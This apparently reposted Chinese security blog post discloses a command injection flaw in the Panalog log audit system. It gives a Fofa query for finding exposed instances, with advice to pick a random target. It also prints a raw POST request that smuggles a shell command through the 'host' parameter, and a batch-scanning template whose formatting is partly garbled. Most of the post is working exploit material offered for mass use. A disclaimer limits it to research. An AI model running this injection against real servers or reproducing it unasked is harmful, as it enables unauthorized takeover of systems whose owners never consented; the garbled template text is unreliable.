喜乐元宵.漏洞简介
Panalog 日志审计系统 libres_syn_delete.php接口处存在RCE漏洞,恶意攻击者可能会利用此漏洞执行恶意代码,最终导致服务器失陷。
喜乐元宵.漏洞复现
步骤一:在Fofa中搜索以下语法并随机确定要进行攻击测试的目标....
# Fofa搜索语法app="Panabit-Panalog"
步骤二:开启代理并打开BP对其首页进行抓包拦截....修改请求头内容...
POST /content-apply/libres_syn_delete.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipConnection: closetoken=1&id=2&host=| echo"Hello World!">lanyue.txt
喜乐元宵.批量脚本
id:Panalog-RCEinfo:name:Panalog:LanYueseverity:highmetadata::app="Panabit-Panalog"variables:filename:"{{to_lower(rand_base(10))}}"boundary:"{{to_lower(rand_base(20))}}"http:raw:|POST/content-apply/libres_syn_delete.php HTTP/1.1Host:{{Hostname}}:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15:application/x-www-form-urlencoded:gzipConnection:closetoken=1&id=2&host=| echo "Hello World!" >{{filename}}.txt|GET/content-apply/{{filename}}.txt HTTP/1.1Host:{{Hostname}}:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0matchers:type: dsldsl:status_code==200 && contains_all(body,"Hello World!")
原文始发于微信公众号(揽月安全团队):Panalog 日志审计系统RCE漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论